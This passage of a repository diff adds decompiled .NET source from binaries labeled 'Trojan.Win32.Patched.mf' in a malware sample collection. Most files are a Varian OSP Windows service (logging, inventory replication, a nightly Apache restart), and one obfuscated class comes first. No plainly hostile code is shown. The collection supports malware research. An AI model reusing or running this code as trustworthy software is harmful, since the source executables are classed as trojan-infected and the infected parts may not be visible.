ady.a(Level.Exception, "RedemptionListenerStart", ex);
}
x.f = new Thread(new ThreadStart(x.d));
x.f.Start();
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "OnStart", ex);
}
}
catch
{
}
}
void ServiceBase.f()
{
try
{
try
{
lock (x.b)
{
if (!x.a)
return;
x.a = false;
try
{
if (this.g != null)
{
this.g.c();
this.g = (lo) null;
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "RedemptionListenerStop", ex);
}
x.f.Interrupt();
Monitor.Wait(x.b);
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "OnStop", ex);
}
}
catch
{
}
}
private static void d()
{
try
{
TimeSpan d = x.d;
TimeSpan timeSpan = TimeSpan.Zero;
while (true)
{
try
{
List<x.a> aList;
do
{
try
{
Thread.Sleep(x.c);
}
catch (ThreadInterruptedException ex)
{
}
lock (x.b)
{
if (!x.a)
{
Monitor.PulseAll(x.b);
return;
}
}
d -= x.c;
timeSpan -= x.c;
aList = new List<x.a>();
if (timeSpan <= TimeSpan.Zero)
{
timeSpan = x.e;
aList.Add(new x.a(x.a));
}
if (d <= TimeSpan.Zero)
{
d = x.d;
aList.Add(new x.a(x.b));
}
}
while (aList.Count == 0);
Delegate.Combine((Delegate[]) aList.ToArray()).DynamicInvoke();
}
catch (Exception ex)
{
ady.a(Level.Exception, "In TimerLoop:", ex);
}
}
}
catch (Exception ex)
{
ady.a(Level.Exception, "Outer layer around TimerLoop:", ex);
}
}
[SpecialName]
internal static bool c()
{
lock (x.b)
return x.a;
}
private static void b()
{
try
{
try
{
bool? A_0 = gs.b();
o4.a(A_0);
fb.a(A_0);
}
catch (Exception ex)
{
ady.a(Level.Exception, "OnFiveMinutes", ex);
}
}
catch
{
}
}
private static void a()
{
try
{
try
{
fb.a();
l9.c();
}
catch (Exception ex)
{
ady.a(Level.Exception, "OnOneHour", ex);
}
}
catch
{
}
}
private delegate void a();
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-01164dae267b1f13c988de64e7fce38753b97528a3dc3fe730e191fc953c65ba/x.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f/Abstract/AbstractService.cs
+73
View File
@@ -0,0 +1,73 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSService.Abstract.AbstractService
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using System;
using System.Diagnostics;
using VMS.OSP.Services.Logging;
namespace VMS.OSService.Abstract
{
public abstract class AbstractService
{
private const string cApplicationId = "Varian OSP Service";
private SysLog _sysLog;
private EventLog _evtLog;
internal void Init(SysLog sysLog, EventLog evtLog)
{
this._sysLog = sysLog;
this._evtLog = evtLog;
}
protected SysLog SysLog => this._sysLog;
protected void WriteSysLog(OSP_SEVERITY eSeverity, string strCategory, string strMessage)
{
if (this.SysLog.ConnectionState.Equals(false))
{
this.SysLog.CloseLog();
this.SysLog.OpenLog();
}
try
{
this.SysLog.Write(eSeverity, (OSP_FACILITY) 3, "Varian OSP Service", strCategory, strMessage);
}
catch (Exception ex)
{
strMessage = "SysLog.Write failed: " + ex.Message + "\r\nOriginal SysLog Msg: " + strMessage;
this.WriteFallBackEntry(eSeverity, strCategory, strMessage);
}
}
private void WriteFallBackEntry(OSP_SEVERITY eSeverity, string strCategory, string strMessage)
{
if (eSeverity == 6)
return;
if (eSeverity == 7)
return;
try
{
strMessage = string.Format("Application: {0}/{1} Severity: {2}\r\n{3}", (object) "Varian OSP Service", (object) strCategory, (object) ((object) eSeverity).ToString(), (object) strMessage);
this._evtLog.WriteEntry(strMessage, EventLogEntryType.Error);
}
catch (Exception ex)
{
}
}
internal virtual void OnStart(string[] args)
{
}
internal virtual void OnStop()
{
}
internal virtual void OnCustomEvent(int command)
{
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f/Abstract/BaseServicesSetup.cs
+70
View File
@@ -0,0 +1,70 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSService.Abstract.BaseServicesSetup
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using System;
using System.Collections;
using System.Configuration;
using System.Diagnostics;
using VMS.OSP.Services.Logging;
namespace VMS.OSService.Abstract
{
public abstract class BaseServicesSetup
{
private ArrayList _concreteServices = new ArrayList();
private SysLog _sysLog;
private EventLog _evtLog;
public BaseServicesSetup(EventLog evtLog)
{
this._evtLog = evtLog;
this.OpenSysLog();
}
private void OpenSysLog()
{
this._sysLog = new SysLog();
this._sysLog.OpenLog();
}
protected bool ServiceComponentEnabled(string componentName)
{
bool flag = true;
try
{
flag = (bool) new AppSettingsReader().GetValue(componentName, typeof (bool));
}
catch (Exception ex)
{
}
return flag;
}
protected void AddService(AbstractService aNewService)
{
aNewService.Init(this._sysLog, this._evtLog);
this._concreteServices.Add((object) aNewService);
}
public void StartAll(string[] args)
{
foreach (AbstractService concreteService in this._concreteServices)
concreteService.OnStart(args);
}
public void StopAll()
{
foreach (AbstractService concreteService in this._concreteServices)
concreteService.OnStop();
}
public void CustomCommandToAll(int cmd)
{
foreach (AbstractService concreteService in this._concreteServices)
concreteService.OnCustomEvent(cmd);
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f/AssemblyInfo.cs
+12
View File
@@ -0,0 +1,12 @@
using System.Reflection;
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyTitle("Varian OSP Service")]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyCopyright("Copyright 2006 Varian Medical Systems")]
[assembly: AssemblyProduct("Varian OSP Service")]
[assembly: AssemblyCompany("Varian Medical Systems, Inc.")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("OSP Software Windows Service")]
[assembly: AssemblyVersion("1.4.2.0")]
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f/Concrete/ConcreteServicesSetup.cs
+39
View File
@@ -0,0 +1,39 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSService.Concrete.ConcreteServicesSetup
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using System.Diagnostics;
using VMS.OSService.Abstract;
using VMS.OSService.Concrete.Inventory;
namespace VMS.OSService.Concrete
{
public class ConcreteServicesSetup : BaseServicesSetup
{
private string cCompInventory = "Inventory";
private string cCompInventoryUpdate = "InventoryUpdate";
private string cCompMaintenance = "Maintenance";
private string cCompPlatformServiceController = "PlatformServiceController";
public ConcreteServicesSetup(EventLog evtLog)
: base(evtLog)
{
this.SetupServices();
}
public void SetupServices()
{
if (this.ServiceComponentEnabled(this.cCompInventory))
this.AddService((AbstractService) new InventoryReplicator());
if (this.ServiceComponentEnabled(this.cCompInventoryUpdate))
this.AddService((AbstractService) new InventoryUpdate());
if (this.ServiceComponentEnabled(this.cCompMaintenance))
this.AddService((AbstractService) new VMS.OSService.Concrete.Maintenance.Maintenance());
if (!this.ServiceComponentEnabled(this.cCompPlatformServiceController))
return;
this.AddService((AbstractService) new VMS.OSService.Concrete.PlatformServiceController.PlatformServiceController());
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f/Concrete/Inventory/InventoryReplicator.cs
+142
View File
@@ -0,0 +1,142 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSService.Concrete.Inventory.InventoryReplicator
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using System;
using System.Net;
using System.Threading;
using VMS.OSP.Inventory;
using VMS.OSP.Inventory.Common;
using VMS.OSP.Services;
using VMS.OSP.Services.Configuration;
using VMS.OSP.Services.Logging;
using VMS.OSService.Abstract;
namespace VMS.OSService.Concrete.Inventory
{
public class InventoryReplicator : AbstractService
{
private const int cSlowReplicationInterval = 7200000;
private const int cPendingReplicationInterval = 3000;
private const int cStartReplicationDelay = 5000;
private const string cSysLogCategory = "InventoryComponent";
private System.Threading.Timer _timer;
private InventoryReplicator.TState _currState;
private DateTime _lastReplicationRequested = DateTime.MaxValue;
public InventoryReplicator() => this._timer = new System.Threading.Timer(new TimerCallback(this.OnTimer), (object) null, -1, -1);
private InventoryReplicator.TState CurrState
{
get => this._currState;
set => this._currState = value;
}
protected void OnTimer(object o)
{
lock (this)
{
switch (this.CurrState)
{
case InventoryReplicator.TState.cReplicationPeriodic:
this.ReplicateClientInventory();
this.RegisterWorkstation();
break;
case InventoryReplicator.TState.cReplicationAfterChanges:
if ((DateTime.Now - this._lastReplicationRequested).TotalMilliseconds < 5000.0)
break;
this._timer.Change(7200000, 7200000);
this.CurrState = InventoryReplicator.TState.cReplicationPeriodic;
this.ReplicateClientInventory();
break;
}
}
}
internal override void OnCustomEvent(int command)
{
switch (command)
{
case 160:
this.ReplicateRequested();
break;
case 161:
this.RegisterWorkstation();
break;
}
}
internal override void OnStart(string[] args)
{
this.WriteSysLog((OSP_SEVERITY) 6, "InventoryComponent", "Inventory Component started");
this._timer.Change(100, 7200000);
}
internal override void OnStop()
{
this.WriteSysLog((OSP_SEVERITY) 6, "InventoryComponent", "Inventory Component stopped");
this._timer.Change(-1, -1);
}
private string InventoryWebServiceUrl => string.Format("http://{0}/ospservices/inventory.asmx", (object) Env.GetServerNameAndPort());
private void ReplicateClientInventory()
{
WebRequest.DefaultWebProxy = (IWebProxy) null;
VMS.OSP.Inventory.Inventory inventory = new VMS.OSP.Inventory.Inventory();
inventory.Url = this.InventoryWebServiceUrl;
string inventoryFileLocation = InventoryConstants.ClientInventoryFileLocation;
string fileLocationVer3 = InventoryConstants.ClientInventoryFileLocationVer3;
try
{
VMSInventoryDoc vmsInventoryDoc = new VMSInventoryDoc();
if (System.IO.File.Exists(inventoryFileLocation))
{
vmsInventoryDoc.Open(inventoryFileLocation, true);
inventory.MergeLocalInventory(vmsInventoryDoc.InternalDataSet);
this.WriteSysLog((OSP_SEVERITY) 6, "InventoryComponent", "Successfully replicated client inventory version 2 to the server.");
}
vmsInventoryDoc.Open(fileLocationVer3, true);
inventory.MergeLocalInventory(vmsInventoryDoc.InternalDataSet);
this.WriteSysLog((OSP_SEVERITY) 6, "InventoryComponent", "Successfully replicated client inventory version 3 to the server.");
}
catch (Exception ex)
{
this.WriteSysLog((OSP_SEVERITY) 3, "InventoryComponent", "" + "Error occurd while replicating client inventory to the server.\r\n" + ex.Message + "\r\n" + "\r\n------- Details ----------\r\n" + "Type\t\t: " + ex.GetType().ToString() + "Source\t\t: " + ex.Source + "\r\n" + "XmlFile\t\t: " + inventoryFileLocation + "\r\n" + "WebService\t: " + this.InventoryWebServiceUrl);
}
}
public void ReplicateRequested()
{
this.CurrState = InventoryReplicator.TState.cReplicationAfterChanges;
this._lastReplicationRequested = DateTime.Now;
this._timer.Change(3000, 3000);
}
private void RegisterWorkstation()
{
try
{
string siteFileLocation = InventoryConstants.ClientRegisterSiteFileLocation;
if (!System.IO.File.Exists(siteFileLocation))
return;
VMSSiteAdminDoc vmsSiteAdminDoc = VMSSiteAdminDoc.Load(siteFileLocation);
if (!new OSPClientLibraryFactory().CreateOspClientServices("DEFAULT").SiteAdmin.RegisterWorkstationToSite(vmsSiteAdminDoc.SiteId))
return;
System.IO.File.Delete(siteFileLocation);
}
catch (Exception ex)
{
this.WriteSysLog((OSP_SEVERITY) 3, "InventoryComponent", "" + "Error occurd while registering workstation in site on the server.\r\n" + ex.Message + "\r\n" + "\r\n------- Details ----------\r\n" + "Type\t\t: " + ex.GetType().ToString() + "Source\t\t: " + ex.Source + "\r\n");
}
}
private enum TState
{
cReplicationPeriodic,
cReplicationAfterChanges,
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f/Concrete/Inventory/InventoryUpdate.cs
+79
View File
@@ -0,0 +1,79 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSService.Concrete.Inventory.InventoryUpdate
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using System;
using System.Configuration;
using System.Threading;
using VMS.OSP.Inventory;
using VMS.OSP.Inventory.Common;
using VMS.OSP.Services.Logging;
using VMS.OSService.Abstract;
namespace VMS.OSService.Concrete.Inventory
{
public class InventoryUpdate : AbstractService
{
private const int cPendingUpdateInterval = 3000;
private const int cStartUpdateDelay = 5000;
private const string cSysLogCategory = "InventoryUpdateComponent";
private long cSlowUpdateInterval = 604800000;
private Timer _timer;
private DateTime _lastUpdateRequested = DateTime.MaxValue;
public InventoryUpdate() => this._timer = new Timer(new TimerCallback(this.OnTimer), (object) null, -1, -1);
protected void OnTimer(object o)
{
lock (this)
this.UpdateClientInventory();
}
internal override void OnCustomEvent(int command)
{
}
internal override void OnStart(string[] args)
{
this.WriteSysLog((OSP_SEVERITY) 6, "InventoryUpdateComponent", "Inventory Operating System and Hotfix Component started");
AppSettingsReader appSettingsReader = new AppSettingsReader();
try
{
this.cSlowUpdateInterval = (long) (int) appSettingsReader.GetValue("InventoryUpdateInterval", typeof (int));
}
catch
{
}
this._timer.Change(this.cSlowUpdateInterval, this.cSlowUpdateInterval);
}
internal override void OnStop()
{
this.WriteSysLog((OSP_SEVERITY) 6, "InventoryUpdateComponent", "Inventory Operating System and Hotfix Component stopped");
this._timer.Change(-1, -1);
}
private void UpdateClientInventory()
{
string fileLocationVer3 = InventoryConstants.ClientInventoryFileLocationVer3;
VMSInventory vmsInventory = new VMSInventory();
try
{
vmsInventory.UpdateInventory(true);
this.WriteSysLog((OSP_SEVERITY) 6, "InventoryUpdateComponent", "Successfully updated operating system and hotfix details to client inventory.");
}
catch (Exception ex)
{
this.WriteSysLog((OSP_SEVERITY) 3, "InventoryUpdateComponent", "" + "Error occurd while updating operating systems and hotfix details to client inventory.\r\n" + ex.Message + "\r\n" + "\r\n------- Details ----------\r\n" + "Type\t\t: " + ex.GetType().ToString() + "Source\t\t: " + ex.Source + "\r\n" + "XmlFile\t\t: " + fileLocationVer3 + "\r\n");
}
}
private enum TState
{
cUpdatePeriodic,
cUpdateAfterChanges,
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f/Concrete/Maintenance/Maintenance.cs
+59
View File
@@ -0,0 +1,59 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSService.Concrete.Maintenance.Maintenance
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using System;
using VMS.OSP.Services.Logging;
using VMS.OSP.Services.Maintenance;
using VMS.OSService.Abstract;
namespace VMS.OSService.Concrete.Maintenance
{
public class Maintenance : AbstractService
{
private const string cSysLogCategory = "MaintenanceComponent";
internal override void OnCustomEvent(int command)
{
if (command != 150)
return;
try
{
this.WriteSysLog((OSP_SEVERITY) 6, "MaintenanceComponent", "Executing Maintenance");
MaintenanceSvc.Instance.ManuallyStartAll();
}
catch (Exception ex)
{
this.WriteSysLog((OSP_SEVERITY) 6, "MaintenanceComponent", "Maintenance comp error: \r\n" + ex.ToString());
}
}
internal override void OnStart(string[] args)
{
try
{
this.WriteSysLog((OSP_SEVERITY) 6, "MaintenanceComponent", "Starting Maintenance Component");
MaintenanceSvc.Instance.StartAsync();
}
catch (Exception ex)
{
this.WriteSysLog((OSP_SEVERITY) 3, "MaintenanceComponent", ex.Message);
}
}
internal override void OnStop()
{
try
{
this.WriteSysLog((OSP_SEVERITY) 6, "MaintenanceComponent", "Stopping Maintenance Component");
MaintenanceSvc.Instance.Stop();
}
catch (Exception ex)
{
this.WriteSysLog((OSP_SEVERITY) 3, "MaintenanceComponent", ex.Message);
}
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f/Concrete/PlatformServiceController/PlatformServiceController.cs
+156
View File
@@ -0,0 +1,156 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSService.Concrete.PlatformServiceController.PlatformServiceController
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.ServiceProcess;
using System.Threading;
using VMS.OSP.Services.Logging;
using VMS.OSService.Abstract;
namespace VMS.OSService.Concrete.PlatformServiceController
{
public class PlatformServiceController : AbstractService
{
private const string cSysLogCategory = "PlatformServiceCtrl";
private const string cApacheServiceName = "Apache2";
private const double clTargetTimeHour = 2.0;
private const double clTargetTimeMinute = 30.0;
private const int ciExecutionPeriod = 24;
private Timer _timer;
private ServiceController _serviceController;
public PlatformServiceController()
{
this._serviceController = new ServiceController("Apache2");
this._timer = new Timer(new TimerCallback(this.OnTimer), (object) null, -1, -1);
}
internal override void OnCustomEvent(int command)
{
}
protected void OnTimer(object o)
{
if (!this.IsApacheInstalledWithPlatformServer().Equals(true))
return;
this.RestartApache();
}
internal override void OnStart(string[] args)
{
try
{
this.WriteSysLog((OSP_SEVERITY) 6, "PlatformServiceCtrl", "PlatformServiceController Component started");
if (!this.IsApacheInstalledWithPlatformServer().Equals(true))
return;
this.SetNextDueTime();
}
catch (Exception ex)
{
this.WriteSysLog((OSP_SEVERITY) 3, "PlatformServiceCtrl", ex.Message);
}
}
internal override void OnStop()
{
try
{
this._timer.Change(-1, -1);
this.WriteSysLog((OSP_SEVERITY) 6, "PlatformServiceCtrl", "PlatformServiceController Component stopped");
}
catch (Exception ex)
{
this.WriteSysLog((OSP_SEVERITY) 3, "PlatformServiceCtrl", ex.Message);
}
}
private void SetNextDueTime()
{
DateTime dateTime = DateTime.Today.AddHours(2.0);
dateTime = dateTime.AddMinutes(30.0);
TimeSpan dueTime = dateTime.Subtract(DateTime.Now);
if (dueTime.Ticks < 0L)
dueTime = dueTime.Add(new TimeSpan(24, 0, 0));
this._timer.Change(dueTime, new TimeSpan(0, 24, 0, 0, 0));
this.WriteSysLog((OSP_SEVERITY) 6, "PlatformServiceCtrl", string.Format("Time duration until first execution: {0}", (object) dueTime));
}
private void RestartApache()
{
try
{
ServiceControllerStatus status = this._serviceController.Status;
this.WriteSysLog((OSP_SEVERITY) 6, "PlatformServiceCtrl", string.Format("Status of {0}: {1}", (object) "Apache2", (object) this._serviceController.Status.ToString()));
if (!status.Equals((object) ServiceControllerStatus.Running))
return;
this.WriteSysLog((OSP_SEVERITY) 6, "PlatformServiceCtrl", string.Format("Stopping {0}.", (object) "Apache2"));
this._serviceController.Stop();
this._serviceController.WaitForStatus(ServiceControllerStatus.Stopped, new TimeSpan(0, 0, 20));
this.WriteSysLog((OSP_SEVERITY) 6, "PlatformServiceCtrl", string.Format("Status of {0}: {1}", (object) "Apache2", (object) this._serviceController.Status.ToString()));
this.KillAllProcessesSyncNamed("rotatelogs");
this.WriteSysLog((OSP_SEVERITY) 6, "PlatformServiceCtrl", string.Format("Starting {0}.", (object) "Apache2"));
this._serviceController.Start();
this._serviceController.WaitForStatus(ServiceControllerStatus.Running, new TimeSpan(0, 0, 20));
this.WriteSysLog((OSP_SEVERITY) 6, "PlatformServiceCtrl", string.Format("Status of {0}: {1}", (object) "Apache2", (object) this._serviceController.Status.ToString()));
}
catch (InvalidOperationException ex)
{
this.WriteSysLog((OSP_SEVERITY) 3, "PlatformServiceCtrl", string.Format("Restarting {0} failed. Reason: {1}", (object) "Apache2", (object) ex.Message));
}
catch (Win32Exception ex)
{
this.WriteSysLog((OSP_SEVERITY) 3, "PlatformServiceCtrl", string.Format("Restarting {0} failed. Reason: {1}", (object) "Apache2", (object) ex.Message));
}
catch (Exception ex)
{
this.WriteSysLog((OSP_SEVERITY) 3, "PlatformServiceCtrl", string.Format("Restarting {0} failed. Reason: {1}", (object) "Apache2", (object) ex.Message));
}
}
private void KillAllProcessesSyncNamed(string processName)
{
foreach (Process process in Process.GetProcessesByName(processName))
{
try
{
process.Kill();
process.WaitForExit();
}
catch
{
}
}
}
private bool IsApacheInstalledWithPlatformServer()
{
bool flag = false;
try
{
string name = "SOFTWARE\\Varian Medical Systems\\OS\\ProductLine\\Platform Server";
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(name))
{
if (registryKey != null)
{
flag = true;
this.WriteSysLog((OSP_SEVERITY) 6, "PlatformServiceCtrl", string.Format("Platform Server installation detected."));
}
else
flag = false;
}
}
catch (Exception ex)
{
flag = false;
this.WriteSysLog((OSP_SEVERITY) 3, "PlatformServiceCtrl", string.Format("Could not retrieve registry key. Reason: {0}", (object) ex.Message));
}
return flag;
}
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f/OSPVersion.cs
+10
View File
@@ -0,0 +1,10 @@
// Decompiled with JetBrains decompiler
// Type: OSPVersion
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
internal class OSPVersion
{
public const string cVerStr = "1.4.2.1";
}
MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f/Trojan.Win32.Patched.mf.csproj
+60
View File
@@ -0,0 +1,60 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{3933AEB5-C476-4FA9-875F-0DE64DF43C30}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>VMS.OSP.Service</AssemblyName>
<ApplicationVersion>1.4.2.0</ApplicationVersion>
<RootNamespace>VMS.OSService</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Configuration" />
<Reference Include="System.Configuration.Install" />
<Reference Include="System.ServiceProcess" />
<Reference Include="System.Web.Services" />
</ItemGroup>
<ItemGroup>
<Compile Include="OSPVersion.cs" />
<Compile Include="VMSOSPService.cs" />
<Compile Include="VMSOSPServiceInstaller.cs" />
<Compile Include="VMSOSPStartup.cs" />
<Compile Include="Abstract\AbstractService.cs" />
